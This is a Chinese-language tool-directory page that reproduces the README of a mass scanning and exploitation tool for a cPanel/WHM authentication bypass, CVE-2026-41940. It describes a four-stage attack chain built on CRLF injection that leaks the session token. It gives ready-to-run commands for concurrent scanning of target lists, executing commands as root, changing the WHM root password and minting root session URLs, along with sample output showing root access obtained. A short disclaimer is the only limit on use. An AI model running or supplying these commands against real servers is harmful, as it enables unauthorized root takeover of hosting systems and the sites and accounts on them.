Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/lutfifakee-project/cve-2026-41940
漏洞扫描器漏洞利用Web应用程序漏洞利用信息收集渗透测试命令与控制身份验证红队Payload 开发
GitHublutfifakee-project/cve-2026-41940

CVE-2026-41940

cPanel/WHM CVE-2026-41940 - 批量扫描与利用工具

254个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
网站
分享

CVE-2026-41940 - cPanel/WHM 认证绕过扫描与利用工具

Python License Security Tested on

用于 CVE-2026-41940 的 cPanel/WHM 认证绕过扫描与利用工具


⚠️ 免责声明

本工具仅供教育和授权安全测试使用。

使用本工具即表示您同意:

  • 您只会测试自己拥有或已获得明确书面授权的系统。
  • 您理解未经授权访问计算机系统是非法的。
  • 您对使用本工具的行为承担全部责任。
  • 您不得再分发、修改或将本工具据为己有。

❗ 作者不对因使用本工具而导致的任何滥用、非法活动、损害或法律后果负责。


🎯 概述

CVE-2026-41940 是 cPanel/WHM 中的一个严重认证绕过漏洞,可能允许攻击者在没有有效凭据的情况下获得未经授权的 root 级访问权限。

本工具提供了基于 Python 的实现,用于:

  • 检测易受攻击的目标
  • 自动化利用(用于授权测试)
  • 执行大规模扫描

🔥 四阶段攻击链

阶段描述
1. 预认证向 /login/ 发送无效凭据以获取 whostmgrsession cookie
2. CRLF 注入通过 Authorization: Basic 头注入换行符以泄露 cpsess token
3. Token 传播触发 do_token_denied 将 token 传播到缓存中
4. 验证访问 /json-api/version 以确认 WHM root 访问权限

✨ 功能

功能描述
🔄 批量扫描并发扫描多个目标
🎯 单目标扫描单个目标并输出详细信息
🔌 端口扫描自动扫描 WHM 端口(2082、2083、2086、2087)
🔓 会话 URL生成一键 WHM 登录 URL
💀 RCE以 root 身份执行系统命令
🔑 修改密码修改 WHM root 密码
📡 WHM API 调用调用 WHM API 函数
🎨 彩色输出可视化输出结果
💾 导出结果将易受攻击的目标保存到文件

📋 环境要求

root@kitploit:~
Python 3.7+
pip install requests urllib3

🚀 安装

root@kitploit:~
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt

# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com

📖 使用方法

基本命令

root@kitploit:~
# Single target
python cpanel-mass-checker.py -u https://target.com:2087

# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20

# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt

# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com

# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com

# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com

# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com

📄 目标文件格式(targets.txt)

root@kitploit:~
# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083

⚙️ 参数

参数描述示例
-u单个目标 URL-u https://target.com:2087
-f目标列表文件-f targets.txt
-c并发数(线程)-c 20
-o输出文件-o results.txt
-hostname自定义 Host 头-hostname cpanel.target.com
--scan-ports扫描所有 WHM 端口--scan-ports
-session生成登录 URL-session
-passwd修改 root 密码-passwd "NewPass123"
-cmd执行命令-cmd "id"
-keep保留临时账户-keep
-api调用 WHM API-api listaccts
-api-paramsAPI 参数-api-params "user=root,password=123"

📊 示例输出

批量扫描

root@kitploit:~
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt

生成会话 URL

root@kitploit:~
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
    https://example.com:2087/cpsessXXXXXXX/

🛡️ 漏洞详情

字段值
CVECVE-2026-41940
严重性严重(CVSS 9.8)
攻击向量网络
所需权限无
用户交互无

受影响版本

  • WHM 11.110.x < 11.110.0.97
  • WHM 11.118.x < 11.118.0.63
  • WHM 11.126.x < 11.126.0.54
  • WHM 11.132.x < 11.132.0.29
  • WHM 11.134.x < 11.134.0.20
  • WHM 11.136.x < 11.136.0.5

⚠️ 重要说明

  • 仅用于已获授权的系统
  • 会话令牌会很快过期
  • RCE 在受限许可下可能失败
  • 某些目标需要指定 -hostname
  • 所有流量均使用 HTTPS

🧪 测试环境

为了安全合法地进行测试:

  • 使用您自己的 VPS/服务器
  • 搭建易受攻击的实验室环境
  • 始终获取书面授权

⭐ 支持

如果这个项目对您有帮助,请考虑给它一个 ⭐

下载工具